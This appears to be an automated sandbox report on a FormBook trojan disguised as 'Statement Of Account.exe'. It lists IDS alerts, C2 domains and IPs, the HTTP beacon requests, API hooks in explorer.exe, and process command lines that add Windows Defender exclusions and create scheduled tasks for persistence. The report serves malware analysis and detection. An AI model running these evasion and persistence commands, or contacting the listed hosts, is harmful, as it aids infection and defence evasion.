                                                                                          04/23/24-18:45:09.660568TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.4160.124.174.163
                                                                                          04/23/24-18:43:47.456512TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.4154.12.38.29
                                                                                          04/23/24-18:44:26.966413TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.434.149.87.45

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Apr 23, 2024 18:43:47.305349112 CEST4974880192.168.2.4154.12.38.29
                                                                                          Apr 23, 2024 18:43:47.456279039 CEST8049748154.12.38.29192.168.2.4
                                                                                          Apr 23, 2024 18:43:47.456387997 CEST4974880192.168.2.4154.12.38.29
                                                                                          Apr 23, 2024 18:43:47.456511974 CEST4974880192.168.2.4154.12.38.29
                                                                                          Apr 23, 2024 18:43:47.607090950 CEST8049748154.12.38.29192.168.2.4
                                                                                          Apr 23, 2024 18:43:47.608602047 CEST8049748154.12.38.29192.168.2.4
                                                                                          Apr 23, 2024 18:43:47.608652115 CEST8049748154.12.38.29192.168.2.4
                                                                                          Apr 23, 2024 18:43:47.608772039 CEST4974880192.168.2.4154.12.38.29
                                                                                          Apr 23, 2024 18:43:47.608910084 CEST4974880192.168.2.4154.12.38.29
                                                                                          Apr 23, 2024 18:43:47.759860992 CEST8049748154.12.38.29192.168.2.4
                                                                                          Apr 23, 2024 18:44:06.090596914 CEST4975080192.168.2.491.195.240.94
                                                                                          Apr 23, 2024 18:44:06.302309036 CEST804975091.195.240.94192.168.2.4
                                                                                          Apr 23, 2024 18:44:06.302421093 CEST4975080192.168.2.491.195.240.94
                                                                                          Apr 23, 2024 18:44:06.302512884 CEST4975080192.168.2.491.195.240.94
                                                                                          Apr 23, 2024 18:44:06.515305996 CEST804975091.195.240.94192.168.2.4
                                                                                          Apr 23, 2024 18:44:06.515389919 CEST804975091.195.240.94192.168.2.4
                                                                                          Apr 23, 2024 18:44:06.515465021 CEST4975080192.168.2.491.195.240.94
                                                                                          Apr 23, 2024 18:44:06.515506983 CEST4975080192.168.2.491.195.240.94
                                                                                          Apr 23, 2024 18:44:06.727155924 CEST804975091.195.240.94192.168.2.4
                                                                                          Apr 23, 2024 18:44:26.588294983 CEST4975180192.168.2.434.149.87.45
                                                                                          Apr 23, 2024 18:44:26.694284916 CEST804975134.149.87.45192.168.2.4
                                                                                          Apr 23, 2024 18:44:26.694437981 CEST4975180192.168.2.434.149.87.45
                                                                                          Apr 23, 2024 18:44:26.966413021 CEST4975180192.168.2.434.149.87.45
                                                                                          Apr 23, 2024 18:44:27.071471930 CEST804975134.149.87.45192.168.2.4
                                                                                          Apr 23, 2024 18:44:27.173396111 CEST804975134.149.87.45192.168.2.4
                                                                                          Apr 23, 2024 18:44:27.173427105 CEST804975134.149.87.45192.168.2.4
                                                                                          Apr 23, 2024 18:44:27.173439026 CEST804975134.149.87.45192.168.2.4
                                                                                          Apr 23, 2024 18:44:27.173449993 CEST804975134.149.87.45192.168.2.4
                                                                                          Apr 23, 2024 18:44:27.173463106 CEST804975134.149.87.45192.168.2.4
                                                                                          Apr 23, 2024 18:44:27.173482895 CEST4975180192.168.2.434.149.87.45
                                                                                          Apr 23, 2024 18:44:27.173516989 CEST4975180192.168.2.434.149.87.45
                                                                                          Apr 23, 2024 18:44:27.173821926 CEST4975180192.168.2.434.149.87.45

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Apr 23, 2024 18:43:46.719729900 CEST5341553192.168.2.41.1.1.1
                                                                                          Apr 23, 2024 18:43:47.304302931 CEST53534151.1.1.1192.168.2.4
                                                                                          Apr 23, 2024 18:44:05.953214884 CEST5897753192.168.2.41.1.1.1
                                                                                          Apr 23, 2024 18:44:06.089726925 CEST53589771.1.1.1192.168.2.4
                                                                                          Apr 23, 2024 18:44:26.424120903 CEST6097553192.168.2.41.1.1.1
                                                                                          Apr 23, 2024 18:44:26.587049007 CEST53609751.1.1.1192.168.2.4
                                                                                          Apr 23, 2024 18:45:08.518268108 CEST5562353192.168.2.41.1.1.1
                                                                                          Apr 23, 2024 18:45:09.355382919 CEST53556231.1.1.1192.168.2.4

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Apr 23, 2024 18:43:46.719729900 CEST192.168.2.41.1.1.10xf4b6Standard query (0)www.airzf.comA (IP address)IN (0x0001)false
                                                                                          Apr 23, 2024 18:44:05.953214884 CEST192.168.2.41.1.1.10xe8dcStandard query (0)www.b-a-s-e.netA (IP address)IN (0x0001)false
                                                                                          Apr 23, 2024 18:44:26.424120903 CEST192.168.2.41.1.1.10xa887Standard query (0)www.zdryueva.comA (IP address)IN (0x0001)false
                                                                                          Apr 23, 2024 18:45:08.518268108 CEST192.168.2.41.1.1.10x4ba3Standard query (0)www.bodution.websiteA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Apr 23, 2024 18:43:47.304302931 CEST1.1.1.1192.168.2.40xf4b6No error (0)www.airzf.com154.12.38.29A (IP address)IN (0x0001)false
                                                                                          Apr 23, 2024 18:44:06.089726925 CEST1.1.1.1192.168.2.40xe8dcNo error (0)www.b-a-s-e.net91.195.240.94A (IP address)IN (0x0001)false
                                                                                          Apr 23, 2024 18:44:26.587049007 CEST1.1.1.1192.168.2.40xa887No error (0)www.zdryueva.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                          Apr 23, 2024 18:44:26.587049007 CEST1.1.1.1192.168.2.40xa887No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                          Apr 23, 2024 18:44:26.587049007 CEST1.1.1.1192.168.2.40xa887No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                          Apr 23, 2024 18:45:09.355382919 CEST1.1.1.1192.168.2.40x4ba3No error (0)www.bodution.website160.124.174.163A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • www.airzf.com
                                                                                          • www.b-a-s-e.net
                                                                                          • www.zdryueva.com

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.449748154.12.38.29802580C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Apr 23, 2024 18:43:47.456511974 CEST154OUTGET /gs12/?r6-=DR9+51rACou4eQBXOdoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpwURv63eY6pg&YN=9rKtZn5 HTTP/1.1
                                                                                          Host: www.airzf.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Apr 23, 2024 18:43:47.608602047 CEST481INHTTP/1.1 301 Moved Permanently
                                                                                          Server: nginx
                                                                                          Date: Tue, 23 Apr 2024 16:43:47 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 162
                                                                                          Connection: close
                                                                                          Location: https://www.airzf.com/gs12/?r6-=DR9+51rACou4eQBXOdoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpwURv63eY6pg&YN=9rKtZn5
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.44975091.195.240.94802580C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Apr 23, 2024 18:44:06.302512884 CEST156OUTGET /gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn5 HTTP/1.1
                                                                                          Host: www.b-a-s-e.net
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Apr 23, 2024 18:44:06.515305996 CEST107INHTTP/1.1 436
                                                                                          date: Tue, 23 Apr 2024 16:44:06 GMT
                                                                                          content-length: 0
                                                                                          server: NginX
                                                                                          connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.44975134.149.87.45802580C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Apr 23, 2024 18:44:26.966413021 CEST157OUTGET /gs12/?r6-=993VfXh0jqtko3ENU03aV9e2gnwjzkI9tuLx/ah8zkvGCI6r8A517lqbkaAk6P8eMjr8&YN=9rKtZn5 HTTP/1.1
                                                                                          Host: www.zdryueva.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Apr 23, 2024 18:44:27.173396111 CEST1289INHTTP/1.1 404 Not Found
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          X-Wix-Request-Id: 1713890667.07612762899732525067
                                                                                          Age: 0
                                                                                          Server: Pepyaka
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Accept-Ranges: bytes
                                                                                          Date: Tue, 23 Apr 2024 16:44:27 GMT
                                                                                          X-Served-By: cache-chi-kigq8000037-CHI
                                                                                          X-Cache: MISS
                                                                                          Vary: Accept-Encoding
                                                                                          Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_g
                                                                                          X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkqHFWhjPEXyPTSLtPMFnp4a0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalmBQ2QY4hzEJNVep8btjXtN21kVvhi4WWi737JqnyfsKzRUqbJQEwoR5t7fXMpcLTA==,2UNV7KOq4oGjA5+PKsX47P9efI/myzj/9e1V5kpi0zpYgeUJqUXtid+86vZww+nL,9DY27ey9PtG1M7AzVTPSAeIGguIVY9cIsA/DsRO7DrY=,g2aKszYfRloBamvU9+FSKbaI/koc3kS7zllmkFk7bZc=,0gGrL7iazMoiuqlb7dEO3Xp6cxvAmf0V9RlaNBeq9FVSB88D0lWBQzqUldF0H79KCJgk4i4ryDgNOsmaMtz63A==
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 google
                                                                                          glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                                          Connection: close
                                                                                          Data Raw: 62 66 32 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67
                                                                                          Data Ascii: bf2 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'pag
                                                                                          Apr 23, 2024 18:44:27.173427105 CEST1289INData Raw: 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65
                                                                                          Data Ascii: e_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link type="image/png" href="//www.wix.com/favicon.i
                                                                                          Apr 23, 2024 18:44:27.173439026 CEST1289INData Raw: 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f
                                                                                          Data Ascii: script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/error-pages/locale/messages_en.js"></script> <!-
                                                                                          Apr 23, 2024 18:44:27.173449993 CEST197INData Raw: 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f
                                                                                          Data Ascii: >Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>0


                                                                                          Code Manipulations

                                                                                          User Modules

                                                                                          Hook Summary

                                                                                          Function NameHook TypeActive in Processes
                                                                                          PeekMessageAINLINEexplorer.exe
                                                                                          PeekMessageWINLINEexplorer.exe
                                                                                          GetMessageWINLINEexplorer.exe
                                                                                          GetMessageAINLINEexplorer.exe

                                                                                          Processes

                                                                                          Process: explorer.exe, Module: user32.dll
                                                                                          Function NameHook TypeNew Data
                                                                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xED
                                                                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xED
                                                                                          GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xED
                                                                                          GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xED

                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:18:42:58
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Users\user\Desktop\Statement Of Account.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\Statement Of Account.exe"
                                                                                          Imagebase:0xb70000
                                                                                          File size:791'040 bytes
                                                                                          MD5 hash:DA68E8FF4E0C0D00C613FA9301CF4A37
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:18:43:00
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe"
                                                                                          Imagebase:0x720000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:18:43:00
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:18:43:00
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe"
                                                                                          Imagebase:0x720000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:5
                                                                                          Start time:18:43:00
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:6
                                                                                          Start time:18:43:00
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp"
                                                                                          Imagebase:0x4d0000
                                                                                          File size:187'904 bytes
                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:7
                                                                                          Start time:18:43:00
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:8
                                                                                          Start time:18:43:01
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                          Imagebase:0x1f0000
                                                                                          File size:45'984 bytes
                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:9
                                                                                          Start time:18:43:01
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\explorer.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                          Imagebase:0x7ff72b770000
                                                                                          File size:5'141'208 bytes
                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000009.00000002.2954894231.000000000F91C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:10
                                                                                          Start time:18:43:03
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                          Imagebase:0x7ff693ab0000
                                                                                          File size:496'640 bytes
                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:11
                                                                                          Start time:18:43:03
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Users\user\AppData\Roaming\SdYCcXyq.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\AppData\Roaming\SdYCcXyq.exe
                                                                                          Imagebase:0x6b0000
                                                                                          File size:791'040 bytes
                                                                                          MD5 hash:DA68E8FF4E0C0D00C613FA9301CF4A37
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 24%, ReversingLabs
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:12
                                                                                          Start time:18:43:04
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp"
                                                                                          Imagebase:0x4d0000
                                                                                          File size:187'904 bytes
                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:13
                                                                                          Start time:18:43:04
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:14
                                                                                          Start time:18:43:05
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                          Imagebase:0xab0000
                                                                                          File size:45'984 bytes
                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:15
                                                                                          Start time:18:43:05
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\SysWOW64\cmstp.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\SysWOW64\cmstp.exe"
                                                                                          Imagebase:0xd0000
                                                                                          File size:81'920 bytes
                                                                                          MD5 hash:D7AABFAB5BEFD53BA3A27BD48F3CC675
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
